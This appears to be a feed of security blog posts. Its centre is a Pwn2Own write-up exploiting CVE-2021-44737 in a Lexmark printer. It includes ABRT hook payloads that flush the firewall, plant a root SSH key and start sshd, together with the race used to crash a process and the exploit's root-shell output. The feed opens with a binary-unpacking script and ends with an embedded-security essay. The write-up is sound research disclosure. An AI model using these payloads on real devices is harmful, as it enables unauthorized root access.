  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)

18 February 2022 at 09:53

Summary

This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022 together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we decided to buy a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, it means there may be a few differences and most probably we would not be able to target some features. We downloaded the firmware updates for both models and they were exactly the same so we decided to pursue since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory indicates all the affected Lexmark models.

The following steps described the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the Printer Job Language (PJL) commands and more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions but older versions are likely vulnerable too. We detail our analysis on CXLBL.075.272 in this blog post since CXLBL.075.281 was released mid-October, and we had already been working on it.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested to know how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to our first installment of our blog series.

Vulnerability details

Background

As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing to read or write files on the device.

PRET is a tool allowing to talk PJL (among other languages) for several printer’s brands, but it does not necessarily support all of their commands due to each vendor supporting its own proprietary commands.

Reaching the vulnerable function

The hydra binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and undocumented.

int __fastcall setup_pjl_commands(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = create_pjl_ctx(a1);
pjl_set_datastall_timeout(pjl_ctx, 5);
sub_11981C();
pjlpGrowCommandHandler("UEL", pjl_handle_uel);
...
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
...

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() at 0x1012F0 starts handling it. We see this command takes a string representing a filename as a first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);
}

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file exists, it won’t open that file and returns immediately. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist in order for us to create the file and we also need to have permissions to write the file.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( !filename )
return 0xFFFFFFFF;
fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL, 0777)
if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);// goes here
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
pjl_process_ustatus_device_(20001);
close(fd);
remove(filename);
return ret;
}

We will analyse pjl_ldwelcomescreen_internal2() below but please note above that the file is closed at the end and then the filename is entirely deleted with the remove() call. This means it seems we can only temporarily write that file.

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
int flag,
int one,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
bad_arg = write_to_file == 0;
if ( write_to_file )
bad_arg = pjl_getc == 0;
if ( bad_arg )
return 0xFFFFFFFF;
if ( flag )
return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd);// goes here due to flag == 0
}

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. This function is quite big and hardly readable decompiled source code is shown below, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into some other allocations into a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
int was_last_write_success,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
unsigned int current_char_2; // r5
size_t len_to_write; // r4
int len_end_data; // r11
int has_encountered_at_sign; // r6
unsigned int current_char_3; // r0
int ret; // r0
int current_char_1; // r3
ssize_t len_written; // r0
unsigned int ret_2; // r3
ssize_t len_written_1; // r0
unsigned int ret_3; // r3
ssize_t len_written_2; // r0
unsigned int ret_4; // r3
int was_last_write_success_1; // r3
size_t len_to_write_final; // r4
ssize_t len_written_final; // r0
unsigned int ret_5; // r3
unsigned int ret_1; // [sp+0h] [bp-20h]
unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
_BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF
current_char_2 = 0xFFFFFFFF;
ret_1 = 0;
b_restart_from_scratch:
len_to_write = 0;
memset(data_to_write, 0, 0x401u);
len_end_data = 0;
has_encountered_at_sign = 0;
current_char_3 = current_char_2;
while ( 1 )
{
current_char = 0;
if ( current_char_3 == 0xFFFFFFFF )
{
// get one character from pjl_ctx->pData
ret = pjl_getc(&current_char);
current_char_1 = current_char;
}
else
{
// a previous character was already retrieved, let's use that for now
current_char_1 = (unsigned __int8)current_char_3;
ret = 1; // success
current_char = current_char_1;
}
if ( has_encountered_at_sign )
break; // exit the loop forever
// is it an '@' sign for a PJL-specific command?
if ( current_char_1 != '@' )
goto b_read_pjl_data;
len_end_data = 1;
has_encountered_at_sign = 1;
b_handle_pjl_at_sign:
// from here, current_char == '@'
if ( len_to_write + 13 > 0x400 ) // ?
{
if ( was_last_write_success )
{
len_written = write_to_file(p_fd, data_to_write, len_to_write);
was_last_write_success = len_to_write == len_written;
current_char_2 = '@';
ret_2 = ret_1;
if ( len_to_write != len_written )
ret_2 = 0xFFFFFFFF;
ret_1 = ret_2;
}
else
{
current_char_2 = '@';
}
goto b_restart_from_scratch;
}
b_read_pjl_data:
if ( ret == 0xFFFFFFFF ) // error
{
if ( !was_last_write_success )
return ret_1;
len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
ret_3 = ret_1;
if ( len_to_write != len_written_1 )
return 0xFFFFFFFF; // error
return ret_3;
}
if ( len_to_write > 0x400 )
__und(0);
// append data to stack buffer
data_to_write[len_to_write++] = current_char_1;
current_char_3 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
// reached 0x400 bytes to write, let's write them
if ( len_to_write == 0x400 )
{
current_char_2 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
if ( was_last_write_success )
{
len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
ret_4 = ret_1;
if ( len_written_2 != 0x400 )
ret_4 = 0xFFFFFFFF;
ret_1 = ret_4;
was_last_write_success_1 = was_last_write_success;
if ( len_written_2 != 0x400 )
was_last_write_success_1 = 0;
was_last_write_success = was_last_write_success_1;
}
goto b_restart_from_scratch;
}
} // end of while ( 1 )
// we reach here if we encountered an '@' sign
// let's check it is a valid "@PJL END DATA" footer
if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
{
len_end_data = 1;
has_encountered_at_sign = 0; // reset so we read it again?
goto b_read_data_or_at;
}
if ( len_end_data != 12 ) // len("PJL END DATA") = 12
{
++len_end_data;
b_read_data_or_at:
// will go back to the while(1) loop but exit at the next
// iteration due to "break" and has_encountered_at_sign == 1
if ( current_char_1 != '@' )
goto b_read_pjl_data;
goto b_handle_pjl_at_sign;
}
// we reach here if all "PJL END DATA" was parsed
current_char = 0;
pjl_getc(&current_char); // read '\r'
if ( current_char == '\r' )
pjl_getc(&current_char); // read '\n'
// write all the remaining data (len < 0x400), except the "PJL END DATA" footer
len_to_write_final = len_to_write - 0xC;
if ( !was_last_write_success )
return ret_1;
len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
ret_5 = ret_1;
if ( len_to_write_final != len_written_final )
return 0xFFFFFFFF;
return ret_5;
}

The pjl_getc() function at 0xFEA18 allows to retrieve one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = get_pjl_ctx();
*ppOut = 0;
InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
{
pjl_set_eoj(pjl_ctx, 0);
pjl_set_InputDataBufferSize(pjl_ctx, 0);
pjl_get_data((int)pjl_ctx);
if ( pjl_get_state(pjl_ctx) == 1 )
return 0xFFFFFFFF; // error
if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
_assert_fail(
"pjlContextGetInputDataBufferSize(pjlContext) != 0",
"/usr/src/debug/jobsystem/git-r0/git/jobcontrol/pjl/pjl.c",
0x1BBu,
"pjl_getc");
}
current_char = pjl_getc_internal(pjl_ctx);
ret = 1;
*ppOut = current_char;
return ret;
}

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
total_written = 0;
do
{
while ( 1 )
{
len_written = write(fd, data_to_write, len_to_write);
len_written_1 = len_written;
if ( len_written < 0 )
break;
if ( !len_written )
goto b_error;
data_to_write = (char *)data_to_write + len_written;
total_written += len_written;
len_to_write -= len_written;
if ( !len_to_write )
return total_written;
}
}
while ( *_errno_location() == EINTR );
b_error:
printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
return 0xFFFFFFFF;
}

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to that file, and if we refrain from sending the PJL command’s footer, it will wait for us to send more data, before it actually deletes the file entirely.

Note: When sending data, we generally want to send padding data to make sure it reaches a multiple of 0x400 so our controlled data is actually written to the file.

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance /usr/share/web/cgi-bin/eventlogdebug_se‘s content is:

#!/bin/ash
echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i
fi
done
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo ""
echo ""
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write /var/fs/shared/eventlog/logs/debug.log.1 file with lots of A using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page:

From testing, we noticed that the file would be automatically deleted between 1min and 1min40, probably due to a timeout in the PJL handling in hydra. This means we are fine to use that temporary file primitive for 60 seconds.

Exploitation

Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf allows to execute shell commands:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following page describes well how ABRT works:

If a program developer (or package maintainer) requires some specific information which ABRT is not
collecting, they can write a custom ABRT hook which collects the required data for his program
(package). Such hook can be run at a different time during the problem processing depending on how
"fresh" the information has to be. It can be run:

1. at the time of the crash
2. at the time when user decides to analyse the problem (usually run gdb on it)
3. at the time of reporting

All you have to do is create a .conf and place it to /etc/libreport/events.d/ from this template:

EVENT=<EVENT_TYPE> [CONDITIONS]
   <whatever command you like>

The commands will execute with the current directory set to the problem directory (e.g:
/var/spool/abrt/ccpp-2012-05-17-14:55:15-31664)

If you need to collect the data at the time of the crash you need to create a hook that will be run as 
a post-create event.

WARNING: post-create events are run with root privileges!

From the above we can determine we need a post-create event and we know it will be executed as root if/when a crash event is actually handled by ABRT.

Finding a process crash

There are several ways to crash a process, and it seems that it usually creates a blue screen of death (BSOD) and then the printer reboots:

Such a process crash is enough to trigger the ABRT behaviour. Once we have such a process crash, abrtd should trigger the post-create event of our controlled file. By starting our own process (e.g. netcat, ssh) that never returns, we can avoid that the crash handling process continues and it will never result in a BSOD.

We abuse a bug in awk to trigger the crash. The version of awk used on the printer is quite old, so it had some bugs that don’t appear to exist on more modern versions. On the device if an awk command is run on a non-existent file, then an invalid free() can be triggered:

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' /tmp/doesnt_exist
free(): invalid pointer
Aborted

In order to trigger this remotely we abuse a race condition that exists due to the second-based granularity (%S format specifier) used for naming log files in apache2. The configuration has the following line:

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p '/usr/bin/apache2-logstat.sh' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S 32K"

The above will trigger a log rotation for every 32KB of logs that are generated, with the resulting log file having a name that is unique, but only at a one second granularity. As a result, if enough HTTP logs are generated such that rotation occurs twice within one second, then two instances of apache2-logstat.sh may be parsing a file with the same name at the same time. In apache2-logstat.sh we see the following:

#!/bin/sh
file_to_compress="${2}"
path_to_logs="/run/log/"
compress_exit_code=0
to_restart=0
rm -f "${path_to_logs}"apache_error_log*.tar.gz
if [[ "${file_to_compress}" ]]; then
echo "Compressing ${file_to_compress} ..."
tar -czf "${file_to_compress}.tar.gz" "${file_to_compress}"
compress_exit_code=${?}
if [[ ${compress_exit_code} == 0 ]]; then
echo "File ${file_to_compress} was compressed."
echo "Check apache server status if needed to restart"
to_restart=$(awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' "${file_to_compress}")
if [ $to_restart -gt "5" ]
then
echo "Time to restart apache .."
rm -f "${path_to_logs}"apache_error_log*
systemctl restart apache2
fi
rm -rf "${file_to_compress}"
else
echo "Error compressing file ${file_to_compress} (tar exit code: ${compress_exit_code})."
fi
fi
exit ${compress_exit_code}

Above file_to_compress is the apache error log file generated per the ErrorLog line shown earlier. After compressing the file successfully, the awk command is run against the file to determine if apache should be restarted, and then otherwise the file is deleted. The problem arises when multiple instances of this script are running at the same time, where one script deletes the log file from disk, and the second script runs awk on the file that no longer exists, which triggers the crash from noted above.

This crash can be triggered simply by sending a lot of HTTP traffic to the device.

Although we used this awk crash to trigger code execution, any remote pre-auth crash should be usable as long as it triggers ABRT to run.

Putting it all together

We use our temporary file write primitive to create the /etc/libreport/events.d/abort_edg.conf file with the following file (padded with lots of spaces due to requirements explained earlier):

EVENT=post-create /bin/ping 192.168.1.7 -c 4
        iptables -F
        /bin/ping 192.168.1.7 -c 4

We trigger a process crash, this will trigger ABRT to execute our above commands. We use interleaving ping commands to confirm when each intermediate command has been executed. We confirm the 8 ping packets being received using Wireshark. Then, we are able to connect to some listening service on the printer that is normally blocked by the firewall, confirming the firewall has been successfully disabled.

The following ABRT hook file disables the firewall, configures SSH and starts it:

EVENT=post-create iptables -F
    /bin/rm /var/fs/security/ssh/ssh_host_key
    mkdir /var/run/sshd || echo foo
    /usr/bin/ssh-keygen -b 256 -t ecdsa -N '' -f /var/fs/security/ssh/ssh_host_key
    echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBABl6xVq6dGu40kDyxwjlMw7sxq4JGhVdc4hvDlDPPhzmAyEBkUWZOPRsLcWYm5kDJN6zFPTS0a4KNbx56qICwkyGAHfRv/+lVMxO2BEPJyYUUdpRC3qmUx0xy3GlgpOUUl90LgiifwcO6UI0P4l+UsewOrDdP6ycuklzJCaa7jLlPkMjQ==" > /var/fs/security/ssh/authorized
    /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
    while true; /bin/ping 192.168.1.7 -c 4; sleep 10; done

The exploit in action:

$ ./MissionAbrt.py -i 192.168.1.4
(13:20:01) [*] [file creation thread] running
(13:20:01) [*] Waiting for firewall to be disabled...
(13:20:01) [*] [file creation thread] connected
(13:20:01) [*] [file creation thread] file created
(13:20:01) [*] [crash thread] running
(13:20:09) [*] Firewall was successfully disabled
(13:20:09) [*] [crash thread] done
(13:20:10) [*] [file creation thread] done
(13:20:10) [*] All threads exited
(13:20:10) [*] Waiting for SSH to be available...
(13:20:10) [*] Spawning SSH shell
Line-buffered terminal emulation. Press F6 or ^Z to send EOF.

id
ABRT has detected 1 problem(s). For more info run: abrt-cli list
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~#

We see we started sshd under abrtd:

[email protected]:~# ps -axjf
...
   1  772  772  772 ?           -1 Ssl      0   0:00 /usr/sbin/abrtd -d -s
 772 2343  772  772 ?           -1 S        0   0:00  \_ abrt-server -s
2343 2550  772  772 ?           -1 SN       0   0:00      \_ /usr/libexec/abrt-handle-event -i --nice 10 -e post-create -- /var/fs/shared/svcerr/abrt/ccpp-2021-10-20-07:06:21-2117
2550 2947  772  772 ?           -1 SN       0   0:00          \_ /bin/sh -c echo 'mission abort!'             iptables -F             echo 'mission abort!'             /bin/rm /var/fs/security/ssh/ssh_host_key             echo 'mission a
2947 2952  772  772 ?           -1 SN       0   0:00              \_ /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
2952 3107 3107 3107 ?           -1 SNs      0   0:00                  \_ sshd: [email protected]/0
3107 3109 3109 3109 pts/0     3128 SNs      0   0:00                      \_ -sh
3109 3128 3128 3109 pts/0     3128 RN+      0   0:00                          \_ ps -axjf

Final words on Pwn2Own

When participating at Pwn2Own, our first attempt failed due to an unknown SSH error, that we did not encounter in our own testing environment. We could see that our commands got executed (the firewall was disabled and the SSH server was started/reachable), but it would not let us connect. Previously to the Pwn2Own event, during our exploit development, we had also tested a netcat payload so we decided to start both payloads on the second attempt which made us win. This shows that having backup plans is always useful when participating at Pwn2Own!

Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review

22 February 2022 at 18:49

During October 2021, O(1) Labs engaged NCC Group’s Cryptography Services team to conduct a cryptography and implementation review of selected components within the main source code repository for the Mina project. Mina implements a cryptocurrency with a lightweight and constant-sized blockchain, where the code is primarily written in OCaml. The selected components involved the client SDK, private/public key functionality, Schnorr signature logic and several other related functions. Full access to source code was provided with support over Discord, and two consultants delivered the engagement with eight person-days of effort.

The Public Report for this review may be downloaded below:

Hardware & Embedded Systems: A little early effort in security can return a huge payoff

22 February 2022 at 21:05

Editor’s note: This piece was originally published by embedded.com

There’s no shortage of companies that need help configuring devices securely, or vendors seeking to remediate vulnerabilities. But from our vantage point at NCC Group, we mostly see devices when working directly with OEMs confronting security issues in their products — and by this point, it’s usually too late to do much. We root out as many vulnerabilities as we can in the time allotted, but many security problems are already baked in. That’s why we advocate so strongly for security early in the development process.

Product Development

Product development for an embedded system has all the stages you expect to find in textbooks. While formal security assessments are most common in the quality testing phase, there is a role for security in all phases.


Figure 1: Typical product design cycle

Requirements and Threat Modelling

We see major security problems introduced even during requirements gathering. Insufficient due diligence here can cause many issues down the line. Conversely, even a little effort at this point can have a huge payoff at the end.

Security Requirements

Functional requirements tell you everything your product is supposed to do, and how. Security requirements outline all the things your product is not supposed to do, and that’s equally important. Security testing occupies this gap, and it’s a vital part of the process.


Figure 2: Testing vs. security testing

Threat Modelling

To develop your security requirements[1],[2], you need a solid understanding of the threat model. Before you can even consider appropriate security controls and mitigations, you must define the product’s security objectives, and the types of threats your product should withstand, in as much detail as possible[3]. This describes all the bad guys who want to compromise your systems and devices, as well as those of your customers and users. They come in many forms:

  • Remote attackers using a wired or wireless network interface (if the device has such capabilities). These attacks can scale easily and affect many devices at once.
  • Local attacks that require an ability to run code on the device, often as a lower privilege. Browser code or mobile apps are examples of such vectors.
  • Physical attackers with possession of the hardware. Lost or stolen devices, rogue administrators, temporary access through short-term rentals, and domestic abuse, are all common examples. This issue is harder to solve, and the best recourse is to increase the cost for the attacker. These come in two forms: cost to develop an attack, and cost to execute. Increasing the first may help buy you time, but if the product is to have any longevity in the market, it’s better to concentrate on the latter. Weaknesses such as sharing secrets across a fleet of devices is an all-too-common design pattern that leads to a near-zero execution cost (once the secret is known).

A reasonable baseline for nearly all modern products is to set the initial bar at “thousands of dollars,” which implies that an attack on the core chipset of the device is required. Anything less, and your product will very likely fall victim to a very cheap circuit attack. Setting the bar this high should not reflect the product cost or price, but rather the value of the assets that the device must protect. Mass market devices like smartphones have had this level of security since at least the early 2000s. And that’s good — every aspect of our lives is accessed by our smartphones, so the cost for an attacker should be high.

A formal threat model is a living document that can be adjusted and consulted as needed throughout the product development cycle.

Platform Selection

Next, you need to select your building blocks: the platform, processor, bootloaders and operating system.

Processor

Most embedded systems are built around a core microcontroller, system-on-chip (SoC) or other CPU. For most companies this involves outsourcing and technical debt: Building connected consumer devices, industrial control systems or vehicle ECUs typically means selecting a chipset from a third-party vendor that meets cost, performance and feature requirements. But let’s not forget security requirements: Not all components are designed with security in mind, and careful evaluation will make this clear. Make sure it has the security features you need — cryptographic accelerators, hardware random number generator, secure boot or other firmware integrity features, a modern memory management unit to implement privilege separation and memory protections, internal fuse-based security configuration, and a hardware root-of-trust. It’s also important to ensure that it doesn’t have security traps you want to avoid. For example:

  • Ask the vendor to show you the security audit of the internal ROM(s).
  • Get details about the security properties of the provisioning systems.
  • Ask how they handle devices returned for failure analysis after debug functionality has been disabled (you’ll be surprised how many admit to having a backdoor).
  • Understand specifics about how the hardware boots the software, security properties of the ROM, bootloader, and firmware reference design.

One crucial aspect of any processor is that it must form a trust anchor: a root-of-trust that can validate the integrity of the system firmware for subsequent boot stages. This typically consists of an immutable first-stage bootloader (in ROM or internal flash), and an immutable public key (commonly programmed into fuses). While all other aspects of the system firmware can be validated, the root-of-trust is trusted implicitly.

Operating System

Next you need to choose a software stack to run atop the hardware and boot system provided by your chip vendor. There are many commercial and open source embedded operating system vendors to choose from, with different levels of security maturity: Linux/Android, FreeRTOS, Zephyr, MbedOS, VxWorks, and more. Many companies will even roll their own. Your chipset vendor will influence the selection with a shortlist of operating systems they support, and anything else means more work for you. The key criteria here are privilege separation, memory protection, capabilities and access controls, secure storage, and modern exploit mitigations. Also important is a vendor commitment to providing ongoing support on the hardware platform you’re using.

Application Runtime

At the application level, where you implement the bulk of the business logic, you again have choices. Most vulnerabilities are memory corruption-related, and they can be severe, even catastrophic. Consequently, these are also among the few classes of vulnerabilities we know how to eliminate, and that’s by using modern memory safe programming languages. If your platform supports such an environment, then applications should be written in Java, Go, Rust or Python. Where this is not possible, employ strong defensive programming and secure development lifecycle (SDLC)[4] techniques to reduce the risk of developer errors ending up in the released product.

Other

Once the requirements are laid out and major platform decisions have been made, the bulk of the design, implementation and testing phases of the product development process can move forward. Through the development cycle, continual security review with reference to the threat model (with updates as needed) will keep you on the right path.

A few other security measures deserve mention:

Patching

Patching and ongoing maintenance is crucial to the continued operation of your devices. Threats evolve rapidly as vulnerabilities are discovered, and new attacker techniques are developed. Staying ahead of the bad guys requires that firmware updates be released on a regular cadence, and that there be a high adoption and installation of these patches. Automatic updates can make this extremely practical for most connected devices. Where safety considerations prevent automatic updates, or where users are otherwise involved in the update process, regular update behavior can sometimes be incentivized (e.g.: Apple has frequently included new emoji collections with their security updates to encourage user adoption).

One challenge is in the form of that technical debt you inherited when you outsourced your board support package. The chip business is sales-driven, and they have little incentive to maintain ongoing support for old devices and BSP versions. One way to help here is to ensure that ongoing security support is enshrined in the contract; otherwise, security is an afterthought.

Manufacturing and supply chain

If you are using a general-purpose microcontroller or SoC from a common vendor, you should expect the root-of-trust to be unconfigured until you provision it. This is where your manufacturing and production processes come into play — it is absolutely vital for these steps to be performed securely if your product is to rely on these bedrock security features[5]. However, there are strong incentives to outsource production to ODM or CM partners with low labor costs — the challenge is to ensure that your root-of-trust is securely configured even with potential threat actors in the factory[6].

Getting these processes in place early in the development cycle can be difficult, partly because secure firmware is likely to lag behind early hardware prototypes. Getting to them late can be equally difficult, because manufacturing is likely to resist process changes once they have a working recipe that produces widgets with the expected yield.

